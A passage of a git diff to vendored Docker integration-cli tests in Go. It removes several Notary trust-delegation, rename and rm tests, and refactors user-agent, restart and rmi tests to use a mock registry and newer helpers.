-func (s *DockerTrustSuite) TestTrustedPushWithReleasesDelegationOnly(c *check.C) {
-	testRequires(c, NotaryHosting)
-	repoName := fmt.Sprintf("%v/dockerclireleasedelegationinitfirst/trusted", privateRegistryURL)
-	targetName := fmt.Sprintf("%s:latest", repoName)
-	s.notaryInitRepo(c, repoName)
-	s.notaryCreateDelegation(c, repoName, "targets/releases", s.not.keys[0].Public)
-	s.notaryPublish(c, repoName)
-
-	s.notaryImportKey(c, repoName, "targets/releases", s.not.keys[0].Private)
-
-	// tag the image and upload it to the private registry
-	dockerCmd(c, "tag", "busybox", targetName)
-
-	pushCmd := exec.Command(dockerBinary, "push", targetName)
-	s.trustedCmd(pushCmd)
-	out, _, err := runCommandWithOutput(pushCmd)
-	c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out))
-	c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag"))
-	// check to make sure that the target has been added to targets/releases and not targets
-	s.assertTargetInRoles(c, repoName, "latest", "targets/releases")
-	s.assertTargetNotInRoles(c, repoName, "latest", "targets")
-
-	// Try pull after push
-	os.RemoveAll(filepath.Join(cliconfig.ConfigDir(), "trust"))
-
-	pullCmd := exec.Command(dockerBinary, "pull", targetName)
-	s.trustedCmd(pullCmd)
-	out, _, err = runCommandWithOutput(pullCmd)
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	c.Assert(string(out), checker.Contains, "Status: Image is up to date", check.Commentf(out))
-}
-
-func (s *DockerTrustSuite) TestTrustedPushSignsAllFirstLevelRolesWeHaveKeysFor(c *check.C) {
-	testRequires(c, NotaryHosting)
-	repoName := fmt.Sprintf("%v/dockerclimanyroles/trusted", privateRegistryURL)
-	targetName := fmt.Sprintf("%s:latest", repoName)
-	s.notaryInitRepo(c, repoName)
-	s.notaryCreateDelegation(c, repoName, "targets/role1", s.not.keys[0].Public)
-	s.notaryCreateDelegation(c, repoName, "targets/role2", s.not.keys[1].Public)
-	s.notaryCreateDelegation(c, repoName, "targets/role3", s.not.keys[2].Public)
-
-	// import everything except the third key
-	s.notaryImportKey(c, repoName, "targets/role1", s.not.keys[0].Private)
-	s.notaryImportKey(c, repoName, "targets/role2", s.not.keys[1].Private)
-
-	s.notaryCreateDelegation(c, repoName, "targets/role1/subrole", s.not.keys[3].Public)
-	s.notaryImportKey(c, repoName, "targets/role1/subrole", s.not.keys[3].Private)
-
-	s.notaryPublish(c, repoName)
-
-	// tag the image and upload it to the private registry
-	dockerCmd(c, "tag", "busybox", targetName)
-
-	pushCmd := exec.Command(dockerBinary, "push", targetName)
-	s.trustedCmd(pushCmd)
-	out, _, err := runCommandWithOutput(pushCmd)
-	c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out))
-	c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag"))
-
-	// check to make sure that the target has been added to targets/role1 and targets/role2, and
-	// not targets (because there are delegations) or targets/role3 (due to missing key) or
-	// targets/role1/subrole (due to it being a second level delegation)
-	s.assertTargetInRoles(c, repoName, "latest", "targets/role1", "targets/role2")
-	s.assertTargetNotInRoles(c, repoName, "latest", "targets")
-
-	// Try pull after push
-	os.RemoveAll(filepath.Join(cliconfig.ConfigDir(), "trust"))
-
-	// pull should fail because none of these are the releases role
-	pullCmd := exec.Command(dockerBinary, "pull", targetName)
-	s.trustedCmd(pullCmd)
-	out, _, err = runCommandWithOutput(pullCmd)
-	c.Assert(err, check.NotNil, check.Commentf(out))
-}
-
-func (s *DockerTrustSuite) TestTrustedPushSignsForRolesWithKeysAndValidPaths(c *check.C) {
-	repoName := fmt.Sprintf("%v/dockerclirolesbykeysandpaths/trusted", privateRegistryURL)
-	targetName := fmt.Sprintf("%s:latest", repoName)
-	s.notaryInitRepo(c, repoName)
-	s.notaryCreateDelegation(c, repoName, "targets/role1", s.not.keys[0].Public, "l", "z")
-	s.notaryCreateDelegation(c, repoName, "targets/role2", s.not.keys[1].Public, "x", "y")
-	s.notaryCreateDelegation(c, repoName, "targets/role3", s.not.keys[2].Public, "latest")
-	s.notaryCreateDelegation(c, repoName, "targets/role4", s.not.keys[3].Public, "latest")
-
-	// import everything except the third key
-	s.notaryImportKey(c, repoName, "targets/role1", s.not.keys[0].Private)
-	s.notaryImportKey(c, repoName, "targets/role2", s.not.keys[1].Private)
-	s.notaryImportKey(c, repoName, "targets/role4", s.not.keys[3].Private)
-
-	s.notaryPublish(c, repoName)
-
-	// tag the image and upload it to the private registry
-	dockerCmd(c, "tag", "busybox", targetName)
-
-	pushCmd := exec.Command(dockerBinary, "push", targetName)
-	s.trustedCmd(pushCmd)
-	out, _, err := runCommandWithOutput(pushCmd)
-	c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out))
-	c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag"))
-
-	// check to make sure that the target has been added to targets/role1 and targets/role4, and
-	// not targets (because there are delegations) or targets/role2 (due to path restrictions) or
-	// targets/role3 (due to missing key)
-	s.assertTargetInRoles(c, repoName, "latest", "targets/role1", "targets/role4")
-	s.assertTargetNotInRoles(c, repoName, "latest", "targets")
-
-	// Try pull after push
-	os.RemoveAll(filepath.Join(cliconfig.ConfigDir(), "trust"))
-
-	// pull should fail because none of these are the releases role
-	pullCmd := exec.Command(dockerBinary, "pull", targetName)
-	s.trustedCmd(pullCmd)
-	out, _, err = runCommandWithOutput(pullCmd)
-	c.Assert(err, check.NotNil, check.Commentf(out))
-}
-
-func (s *DockerTrustSuite) TestTrustedPushDoesntSignTargetsIfDelegationsExist(c *check.C) {
-	testRequires(c, NotaryHosting)
-	repoName := fmt.Sprintf("%v/dockerclireleasedelegationnotsignable/trusted", privateRegistryURL)
-	targetName := fmt.Sprintf("%s:latest", repoName)
-	s.notaryInitRepo(c, repoName)
-	s.notaryCreateDelegation(c, repoName, "targets/role1", s.not.keys[0].Public)
-	s.notaryPublish(c, repoName)
-
-	// do not import any delegations key
-
-	// tag the image and upload it to the private registry
-	dockerCmd(c, "tag", "busybox", targetName)
-
-	pushCmd := exec.Command(dockerBinary, "push", targetName)
-	s.trustedCmd(pushCmd)
-	out, _, err := runCommandWithOutput(pushCmd)
-	c.Assert(err, check.NotNil, check.Commentf("trusted push succeeded but should have failed:\n%s", out))
-	c.Assert(out, checker.Contains, "no valid signing keys",
-		check.Commentf("Missing expected output on trusted push without keys"))
-
-	s.assertTargetNotInRoles(c, repoName, "latest", "targets", "targets/role1")
-}
-
 func (s *DockerRegistryAuthHtpasswdSuite) TestPushNoCredentialsNoRetry(c *check.C) {
 	repoName := fmt.Sprintf("%s/busybox", privateRegistryURL)
 	dockerCmd(c, "tag", "busybox", repoName)
@@ -675,15 +341,16 @@ func (s *DockerRegistryAuthTokenSuite) TestPushMisconfiguredTokenServiceResponse
 }
 
 func (s *DockerRegistryAuthTokenSuite) TestPushMisconfiguredTokenServiceResponseError(c *check.C) {
-	ts := getTestTokenService(http.StatusTooManyRequests, `{"errors": [{"code":"TOOMANYREQUESTS","message":"out of tokens"}]}`, 4)
+	ts := getTestTokenService(http.StatusTooManyRequests, `{"errors": [{"code":"TOOMANYREQUESTS","message":"out of tokens"}]}`, 3)
 	defer ts.Close()
 	s.setupRegistryWithTokenService(c, ts.URL)
 	repoName := fmt.Sprintf("%s/busybox", privateRegistryURL)
 	dockerCmd(c, "tag", "busybox", repoName)
 	out, _, err := dockerCmdWithError("push", repoName)
 	c.Assert(err, check.NotNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, "Retrying")
-	c.Assert(out, checker.Not(checker.Contains), "Retrying in 15")
+	// TODO: isolate test so that it can be guaranteed that the 503 will trigger xfer retries
+	//c.Assert(out, checker.Contains, "Retrying")
+	//c.Assert(out, checker.Not(checker.Contains), "Retrying in 15")
 	split := strings.Split(out, "\n")
 	c.Assert(split[len(split)-2], check.Equals, "toomanyrequests: out of tokens")
 }
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_registry_user_agent_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_registry_user_agent_test.go
index fb9a66a541..7ee3c3d1ba 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_registry_user_agent_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_registry_user_agent_test.go
@@ -2,9 +2,12 @@ package main
 
 import (
 	"fmt"
+	"io/ioutil"
 	"net/http"
+	"os"
 	"regexp"
 
+	"github.com/docker/docker/internal/test/registry"
 	"github.com/go-check/check"
 )
 
@@ -46,9 +49,14 @@ func regexpCheckUA(c *check.C, ua string) {
 	c.Assert(bMatchUpstreamUA, check.Equals, true, check.Commentf("(Upstream) Docker Client User-Agent malformed"))
 }
 
-func registerUserAgentHandler(reg *testRegistry, result *string) {
-	reg.registerHandler("/v2/", func(w http.ResponseWriter, r *http.Request) {
+// registerUserAgentHandler registers a handler for the `/v2/*` endpoint.
+// Note that a 404 is returned to prevent the client to proceed.
+// We are only checking if the client sent a valid User Agent string along
+// with the request.
+func registerUserAgentHandler(reg *registry.Mock, result *string) {
+	reg.RegisterHandler("/v2/", func(w http.ResponseWriter, r *http.Request) {
 		w.WriteHeader(404)
+		w.Write([]byte(`{"errors":[{"code": "UNSUPPORTED","message": "this is a mock registry"}]}`))
 		var ua string
 		for k, v := range r.Header {
 			if k == "User-Agent" {
@@ -61,60 +69,35 @@ func registerUserAgentHandler(reg *testRegistry, result *string) {
 
 // TestUserAgentPassThrough verifies that when an image is pulled from
 // a registry, the registry should see a User-Agent string of the form
-// [docker engine UA] UptreamClientSTREAM-CLIENT([client UA])
+// [docker engine UA] UpstreamClientSTREAM-CLIENT([client UA])
 func (s *DockerRegistrySuite) TestUserAgentPassThrough(c *check.C) {
-	var (
-		buildUA string
-		pullUA  string
-		pushUA  string
-		loginUA string
-	)
-
-	buildReg, err := newTestRegistry(c)
-	c.Assert(err, check.IsNil)
-	registerUserAgentHandler(buildReg, &buildUA)
-	buildRepoName := fmt.Sprintf("%s/busybox", buildReg.hostport)
+	var ua string
 
-	pullReg, err := newTestRegistry(c)
+	reg, err := registry.NewMock(c)
+	defer reg.Close()
 	c.Assert(err, check.IsNil)
-	registerUserAgentHandler(pullReg, &pullUA)
-	pullRepoName := fmt.Sprintf("%s/busybox", pullReg.hostport)
+	registerUserAgentHandler(reg, &ua)
+	repoName := fmt.Sprintf("%s/busybox", reg.URL())
 
-	pushReg, err := newTestRegistry(c)
-	c.Assert(err, check.IsNil)
-	registerUserAgentHandler(pushReg, &pushUA)
-	pushRepoName := fmt.Sprintf("%s/busybox", pushReg.hostport)
+	s.d.StartWithBusybox(c, "--insecure-registry", reg.URL())
 
-	loginReg, err := newTestRegistry(c)
-	c.Assert(err, check.IsNil)
-	registerUserAgentHandler(loginReg, &loginUA)
-
-	err = s.d.Start(
-		"--insecure-registry", buildReg.hostport,
-		"--insecure-registry", pullReg.hostport,
-		"--insecure-registry", pushReg.hostport,
-		"--insecure-registry", loginReg.hostport,
-		"--disable-legacy-registry=true")
+	tmp, err := ioutil.TempDir("", "integration-cli-")
 	c.Assert(err, check.IsNil)
+	defer os.RemoveAll(tmp)
 
-	dockerfileName, cleanup1, err := makefile(fmt.Sprintf("FROM %s", buildRepoName))
+	dockerfile, err := makefile(tmp, fmt.Sprintf("FROM %s", repoName))
 	c.Assert(err, check.IsNil, check.Commentf("Unable to create test dockerfile"))
-	defer cleanup1()
-	s.d.Cmd("build", "--file", dockerfileName, ".")
-	regexpCheckUA(c, buildUA)
 
-	s.d.Cmd("login", "-u", "richard", "-p", "testtest", "-e", "testuser@testdomain.com", loginReg.hostport)
-	regexpCheckUA(c, loginUA)
+	s.d.Cmd("build", "--file", dockerfile, tmp)
+	regexpCheckUA(c, ua)
 
-	s.d.Cmd("pull", pullRepoName)
-	regexpCheckUA(c, pullUA)
+	s.d.Cmd("login", "-u", "richard", "-p", "testtest", reg.URL())
+	regexpCheckUA(c, ua)
 
-	dockerfileName, cleanup2, err := makefile(`FROM scratch
-	ENV foo bar`)
-	c.Assert(err, check.IsNil, check.Commentf("Unable to create test dockerfile"))
-	defer cleanup2()
-	s.d.Cmd("build", "-t", pushRepoName, "--file", dockerfileName, ".")
+	s.d.Cmd("pull", repoName)
+	regexpCheckUA(c, ua)
 
-	s.d.Cmd("push", pushRepoName)
-	regexpCheckUA(c, pushUA)
+	s.d.Cmd("tag", "busybox", repoName)
+	s.d.Cmd("push", repoName)
+	regexpCheckUA(c, ua)
 }
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_rename_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_rename_test.go
deleted file mode 100644
index 373d614b5e..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_rename_test.go
+++ /dev/null
@@ -1,138 +0,0 @@
-package main
-
-import (
-	"strings"
-
-	"github.com/docker/docker/pkg/integration/checker"
-	icmd "github.com/docker/docker/pkg/integration/cmd"
-	"github.com/docker/docker/pkg/stringid"
-	"github.com/go-check/check"
-)
-
-func (s *DockerSuite) TestRenameStoppedContainer(c *check.C) {
-	out, _ := dockerCmd(c, "run", "--name", "first_name", "-d", "busybox", "sh")
-
-	cleanedContainerID := strings.TrimSpace(out)
-	dockerCmd(c, "wait", cleanedContainerID)
-
-	name := inspectField(c, cleanedContainerID, "Name")
-	newName := "new_name" + stringid.GenerateNonCryptoID()
-	dockerCmd(c, "rename", "first_name", newName)
-
-	name = inspectField(c, cleanedContainerID, "Name")
-	c.Assert(name, checker.Equals, "/"+newName, check.Commentf("Failed to rename container %s", name))
-
-}
-
-func (s *DockerSuite) TestRenameRunningContainer(c *check.C) {
-	out, _ := dockerCmd(c, "run", "--name", "first_name", "-d", "busybox", "sh")
-
-	newName := "new_name" + stringid.GenerateNonCryptoID()
-	cleanedContainerID := strings.TrimSpace(out)
-	dockerCmd(c, "rename", "first_name", newName)
-
-	name := inspectField(c, cleanedContainerID, "Name")
-	c.Assert(name, checker.Equals, "/"+newName, check.Commentf("Failed to rename container %s", name))
-}
-
-func (s *DockerSuite) TestRenameRunningContainerAndReuse(c *check.C) {
-	out, _ := runSleepingContainer(c, "--name", "first_name")
-	c.Assert(waitRun("first_name"), check.IsNil)
-
-	newName := "new_name"
-	ContainerID := strings.TrimSpace(out)
-	dockerCmd(c, "rename", "first_name", newName)
-
-	name := inspectField(c, ContainerID, "Name")
-	c.Assert(name, checker.Equals, "/"+newName, check.Commentf("Failed to rename container"))
-
-	out, _ = runSleepingContainer(c, "--name", "first_name")
-	c.Assert(waitRun("first_name"), check.IsNil)
-	newContainerID := strings.TrimSpace(out)
-	name = inspectField(c, newContainerID, "Name")
-	c.Assert(name, checker.Equals, "/first_name", check.Commentf("Failed to reuse container name"))
-}
-
-func (s *DockerSuite) TestRenameCheckNames(c *check.C) {
-	dockerCmd(c, "run", "--name", "first_name", "-d", "busybox", "sh")
-
-	newName := "new_name" + stringid.GenerateNonCryptoID()
-	dockerCmd(c, "rename", "first_name", newName)
-
-	name := inspectField(c, newName, "Name")
-	c.Assert(name, checker.Equals, "/"+newName, check.Commentf("Failed to rename container %s", name))
-
-	result := dockerCmdWithResult("inspect", "-f={{.Name}}", "--type=container", "first_name")
-	c.Assert(result, icmd.Matches, icmd.Expected{
-		ExitCode: 1,
-		Err:      "No such container: first_name",
-	})
-}
-
-func (s *DockerSuite) TestRenameInvalidName(c *check.C) {
-	runSleepingContainer(c, "--name", "myname")
-
-	out, _, err := dockerCmdWithError("rename", "myname", "new:invalid")
-	c.Assert(err, checker.NotNil, check.Commentf("Renaming container to invalid name should have failed: %s", out))
-	c.Assert(out, checker.Contains, "Invalid container name", check.Commentf("%v", err))
-
-	out, _, err = dockerCmdWithError("rename", "myname")
-	c.Assert(err, checker.NotNil, check.Commentf("Renaming container to invalid name should have failed: %s", out))
-	c.Assert(out, checker.Contains, "requires exactly 2 argument(s).", check.Commentf("%v", err))
-
-	out, _, err = dockerCmdWithError("rename", "myname", "")
-	c.Assert(err, checker.NotNil, check.Commentf("Renaming container to invalid name should have failed: %s", out))
-	c.Assert(out, checker.Contains, "may be empty", check.Commentf("%v", err))
-
-	out, _, err = dockerCmdWithError("rename", "", "newname")
-	c.Assert(err, checker.NotNil, check.Commentf("Renaming container with empty name should have failed: %s", out))
-	c.Assert(out, checker.Contains, "may be empty", check.Commentf("%v", err))
-
-	out, _ = dockerCmd(c, "ps", "-a")
-	c.Assert(out, checker.Contains, "myname", check.Commentf("Output of docker ps should have included 'myname': %s", out))
-}
-
-func (s *DockerSuite) TestRenameAnonymousContainer(c *check.C) {
-	testRequires(c, DaemonIsLinux)
-
-	dockerCmd(c, "network", "create", "network1")
-	out, _ := dockerCmd(c, "create", "-it", "--net", "network1", "busybox", "top")
-
-	anonymousContainerID := strings.TrimSpace(out)
-
-	dockerCmd(c, "rename", anonymousContainerID, "container1")
-	dockerCmd(c, "start", "container1")
-
-	count := "-c"
-	if daemonPlatform == "windows" {
-		count = "-n"
-	}
-
-	_, _, err := dockerCmdWithError("run", "--net", "network1", "busybox", "ping", count, "1", "container1")
-	c.Assert(err, check.IsNil, check.Commentf("Embedded DNS lookup fails after renaming anonymous container: %v", err))
-}
-
-func (s *DockerSuite) TestRenameContainerWithSameName(c *check.C) {
-	out, _ := runSleepingContainer(c, "--name", "old")
-	ContainerID := strings.TrimSpace(out)
-
-	out, _, err := dockerCmdWithError("rename", "old", "old")
-	c.Assert(err, checker.NotNil, check.Commentf("Renaming a container with the same name should have failed"))
-	c.Assert(out, checker.Contains, "Renaming a container with the same name", check.Commentf("%v", err))
-
-	out, _, err = dockerCmdWithError("rename", ContainerID, "old")
-	c.Assert(err, checker.NotNil, check.Commentf("Renaming a container with the same name should have failed"))
-	c.Assert(out, checker.Contains, "Renaming a container with the same name", check.Commentf("%v", err))
-}
-
-// Test case for #23973
-func (s *DockerSuite) TestRenameContainerWithLinkedContainer(c *check.C) {
-	testRequires(c, DaemonIsLinux)
-
-	db1, _ := dockerCmd(c, "run", "--name", "db1", "-d", "busybox", "top")
-	dockerCmd(c, "run", "--name", "app1", "-d", "--link", "db1:/mysql", "busybox", "top")
-	dockerCmd(c, "rename", "app1", "app2")
-	out, _, err := dockerCmdWithError("inspect", "--format={{ .Id }}", "app2/mysql")
-	c.Assert(err, checker.IsNil)
-	c.Assert(strings.TrimSpace(out), checker.Equals, strings.TrimSpace(db1))
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_restart_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_restart_test.go
index 7d585289eb..1b4c928b9a 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_restart_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_restart_test.go
@@ -6,14 +6,13 @@ import (
 	"strings"
 	"time"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
 	"github.com/go-check/check"
 )
 
 func (s *DockerSuite) TestRestartStoppedContainer(c *check.C) {
 	dockerCmd(c, "run", "--name=test", "busybox", "echo", "foobar")
-	cleanedContainerID, err := getIDByName("test")
-	c.Assert(err, check.IsNil)
+	cleanedContainerID := getIDByName(c, "test")
 
 	out, _ := dockerCmd(c, "logs", cleanedContainerID)
 	c.Assert(out, checker.Equals, "foobar\n")
@@ -21,7 +20,7 @@ func (s *DockerSuite) TestRestartStoppedContainer(c *check.C) {
 	dockerCmd(c, "restart", cleanedContainerID)
 
 	// Wait until the container has stopped
-	err = waitInspect(cleanedContainerID, "{{.State.Running}}", "false", 20*time.Second)
+	err := waitInspect(cleanedContainerID, "{{.State.Running}}", "false", 20*time.Second)
 	c.Assert(err, checker.IsNil)
 
 	out, _ = dockerCmd(c, "logs", cleanedContainerID)
@@ -35,22 +34,25 @@ func (s *DockerSuite) TestRestartRunningContainer(c *check.C) {
 
 	c.Assert(waitRun(cleanedContainerID), checker.IsNil)
 
-	out, _ = dockerCmd(c, "logs", cleanedContainerID)
-	c.Assert(out, checker.Equals, "foobar\n")
-
-	dockerCmd(c, "restart", "-t", "1", cleanedContainerID)
+	getLogs := func(c *check.C) (interface{}, check.CommentInterface) {
+		out, _ := dockerCmd(c, "logs", cleanedContainerID)
+		return out, nil
+	}
 
-	out, _ = dockerCmd(c, "logs", cleanedContainerID)
+	// Wait 10 seconds for the 'echo' to appear in the logs
+	waitAndAssert(c, 10*time.Second, getLogs, checker.Equals, "foobar\n")
 
+	dockerCmd(c, "restart", "-t", "1", cleanedContainerID)
 	c.Assert(waitRun(cleanedContainerID), checker.IsNil)
 
-	c.Assert(out, checker.Equals, "foobar\nfoobar\n")
+	// Wait 10 seconds for first 'echo' appear (again) in the logs
+	waitAndAssert(c, 10*time.Second, getLogs, checker.Equals, "foobar\nfoobar\n")
 }
 
 // Test that restarting a container with a volume does not create a new volume on restart. Regression test for #819.
 func (s *DockerSuite) TestRestartWithVolumes(c *check.C) {
 	prefix, slash := getPrefixAndSlashFromDaemonPlatform()
-	out, _ := runSleepingContainer(c, "-d", "-v", prefix+slash+"test")
+	out := runSleepingContainer(c, "-d", "-v", prefix+slash+"test")
 
 	cleanedContainerID := strings.TrimSpace(out)
 	out, err := inspectFilter(cleanedContainerID, "len .Mounts")
@@ -73,6 +75,23 @@ func (s *DockerSuite) TestRestartWithVolumes(c *check.C) {
 	c.Assert(source, checker.Equals, sourceAfterRestart)
 }
 
+func (s *DockerSuite) TestRestartDisconnectedContainer(c *check.C) {
+	testRequires(c, DaemonIsLinux, SameHostDaemon, NotUserNamespace, NotArm)
+
+	// Run a container on the default bridge network
+	out, _ := dockerCmd(c, "run", "-d", "--name", "c0", "busybox", "top")
+	cleanedContainerID := strings.TrimSpace(out)
+	c.Assert(waitRun(cleanedContainerID), checker.IsNil)
+
+	// Disconnect the container from the network
+	out, err := dockerCmd(c, "network", "disconnect", "bridge", "c0")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+
+	// Restart the container
+	dockerCmd(c, "restart", "c0")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+}
+
 func (s *DockerSuite) TestRestartPolicyNO(c *check.C) {
 	out, _ := dockerCmd(c, "create", "--restart=no", "busybox")
 
@@ -147,7 +166,7 @@ func (s *DockerSuite) TestRestartContainerwithGoodContainer(c *check.C) {
 func (s *DockerSuite) TestRestartContainerSuccess(c *check.C) {
 	testRequires(c, SameHostDaemon)
 
-	out, _ := runSleepingContainer(c, "-d", "--restart=always")
+	out := runSleepingContainer(c, "-d", "--restart=always")
 	id := strings.TrimSpace(out)
 	c.Assert(waitRun(id), check.IsNil)
 
@@ -216,7 +235,7 @@ func (s *DockerSuite) TestRestartWithPolicyUserDefinedNetwork(c *check.C) {
 func (s *DockerSuite) TestRestartPolicyAfterRestart(c *check.C) {
 	testRequires(c, SameHostDaemon)
 
-	out, _ := runSleepingContainer(c, "-d", "--restart=always")
+	out := runSleepingContainer(c, "-d", "--restart=always")
 	id := strings.TrimSpace(out)
 	c.Assert(waitRun(id), check.IsNil)
 
@@ -250,7 +269,7 @@ func (s *DockerSuite) TestRestartContainerwithRestartPolicy(c *check.C) {
 	id1 := strings.TrimSpace(string(out1))
 	id2 := strings.TrimSpace(string(out2))
 	waitTimeout := 15 * time.Second
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		waitTimeout = 150 * time.Second
 	}
 	err := waitInspect(id1, "{{ .State.Restarting }} {{ .State.Running }}", "false false", waitTimeout)
@@ -259,14 +278,23 @@ func (s *DockerSuite) TestRestartContainerwithRestartPolicy(c *check.C) {
 	dockerCmd(c, "restart", id1)
 	dockerCmd(c, "restart", id2)
 
+	// Make sure we can stop/start (regression test from a705e166cf3bcca62543150c2b3f9bfeae45ecfa)
 	dockerCmd(c, "stop", id1)
 	dockerCmd(c, "stop", id2)
 	dockerCmd(c, "start", id1)
 	dockerCmd(c, "start", id2)
+
+	// Kill the containers, making sure the are stopped at the end of the test
+	dockerCmd(c, "kill", id1)
+	dockerCmd(c, "kill", id2)
+	err = waitInspect(id1, "{{ .State.Restarting }} {{ .State.Running }}", "false false", waitTimeout)
+	c.Assert(err, checker.IsNil)
+	err = waitInspect(id2, "{{ .State.Restarting }} {{ .State.Running }}", "false false", waitTimeout)
+	c.Assert(err, checker.IsNil)
 }
 
 func (s *DockerSuite) TestRestartAutoRemoveContainer(c *check.C) {
-	out, _ := runSleepingContainer(c, "--rm")
+	out := runSleepingContainer(c, "--rm")
 
 	id := strings.TrimSpace(string(out))
 	dockerCmd(c, "restart", id)
@@ -275,4 +303,7 @@ func (s *DockerSuite) TestRestartAutoRemoveContainer(c *check.C) {
 
 	out, _ = dockerCmd(c, "ps")
 	c.Assert(out, checker.Contains, id[:12], check.Commentf("container should be restarted instead of removed: %v", out))
+
+	// Kill the container to make sure it will be removed
+	dockerCmd(c, "kill", id)
 }
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_rm_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_rm_test.go
deleted file mode 100644
index 0186c56741..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_rm_test.go
+++ /dev/null
@@ -1,86 +0,0 @@
-package main
-
-import (
-	"io/ioutil"
-	"os"
-
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/go-check/check"
-)
-
-func (s *DockerSuite) TestRmContainerWithRemovedVolume(c *check.C) {
-	testRequires(c, SameHostDaemon)
-
-	prefix, slash := getPrefixAndSlashFromDaemonPlatform()
-
-	tempDir, err := ioutil.TempDir("", "test-rm-container-with-removed-volume-")
-	if err != nil {
-		c.Fatalf("failed to create temporary directory: %s", tempDir)
-	}
-	defer os.RemoveAll(tempDir)
-
-	dockerCmd(c, "run", "--name", "losemyvolumes", "-v", tempDir+":"+prefix+slash+"test", "busybox", "true")
-
-	err = os.RemoveAll(tempDir)
-	c.Assert(err, check.IsNil)
-
-	dockerCmd(c, "rm", "-v", "losemyvolumes")
-}
-
-func (s *DockerSuite) TestRmContainerWithVolume(c *check.C) {
-	prefix, slash := getPrefixAndSlashFromDaemonPlatform()
-
-	dockerCmd(c, "run", "--name", "foo", "-v", prefix+slash+"srv", "busybox", "true")
-
-	dockerCmd(c, "rm", "-v", "foo")
-}
-
-func (s *DockerSuite) TestRmContainerRunning(c *check.C) {
-	createRunningContainer(c, "foo")
-
-	_, _, err := dockerCmdWithError("rm", "foo")
-	c.Assert(err, checker.NotNil, check.Commentf("Expected error, can't rm a running container"))
-}
-
-func (s *DockerSuite) TestRmContainerForceRemoveRunning(c *check.C) {
-	createRunningContainer(c, "foo")
-
-	// Stop then remove with -s
-	dockerCmd(c, "rm", "-f", "foo")
-}
-
-func (s *DockerSuite) TestRmContainerOrphaning(c *check.C) {
-	dockerfile1 := `FROM busybox:latest
-	ENTRYPOINT ["true"]`
-	img := "test-container-orphaning"
-	dockerfile2 := `FROM busybox:latest
-	ENTRYPOINT ["true"]
-	MAINTAINER Integration Tests`
-
-	// build first dockerfile
-	img1, err := buildImage(img, dockerfile1, true)
-	c.Assert(err, check.IsNil, check.Commentf("Could not build image %s", img))
-	// run container on first image
-	dockerCmd(c, "run", img)
-	// rebuild dockerfile with a small addition at the end
-	_, err = buildImage(img, dockerfile2, true)
-	c.Assert(err, check.IsNil, check.Commentf("Could not rebuild image %s", img))
-	// try to remove the image, should not error out.
-	out, _, err := dockerCmdWithError("rmi", img)
-	c.Assert(err, check.IsNil, check.Commentf("Expected to removing the image, but failed: %s", out))
-
-	// check if we deleted the first image
-	out, _ = dockerCmd(c, "images", "-q", "--no-trunc")
-	c.Assert(out, checker.Contains, img1, check.Commentf("Orphaned container (could not find %q in docker images): %s", img1, out))
-
-}
-
-func (s *DockerSuite) TestRmInvalidContainer(c *check.C) {
-	out, _, err := dockerCmdWithError("rm", "unknown")
-	c.Assert(err, checker.NotNil, check.Commentf("Expected error on rm unknown container, got none"))
-	c.Assert(out, checker.Contains, "No such container")
-}
-
-func createRunningContainer(c *check.C, name string) {
-	runSleepingContainer(c, "-dt", "--name", name)
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_rmi_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_rmi_test.go
index cb16d9d88c..6622856823 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_rmi_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_rmi_test.go
@@ -2,13 +2,15 @@ package main
 
 import (
 	"fmt"
-	"os/exec"
 	"strings"
 	"time"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli"
+	"github.com/docker/docker/integration-cli/cli/build"
 	"github.com/docker/docker/pkg/stringid"
 	"github.com/go-check/check"
+	"gotest.tools/icmd"
 )
 
 func (s *DockerSuite) TestRmiWithContainerFails(c *check.C) {
@@ -61,84 +63,78 @@ func (s *DockerSuite) TestRmiTag(c *check.C) {
 }
 
 func (s *DockerSuite) TestRmiImgIDMultipleTag(c *check.C) {
-	out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir '/busybox-one'")
-
+	out := cli.DockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir '/busybox-one'").Combined()
 	containerID := strings.TrimSpace(out)
 
 	// Wait for it to exit as cannot commit a running container on Windows, and
 	// it will take a few seconds to exit
-	if daemonPlatform == "windows" {
-		err := waitExited(containerID, 60*time.Second)
-		c.Assert(err, check.IsNil)
+	if testEnv.OSType == "windows" {
+		cli.WaitExited(c, containerID, 60*time.Second)
 	}
 
-	dockerCmd(c, "commit", containerID, "busybox-one")
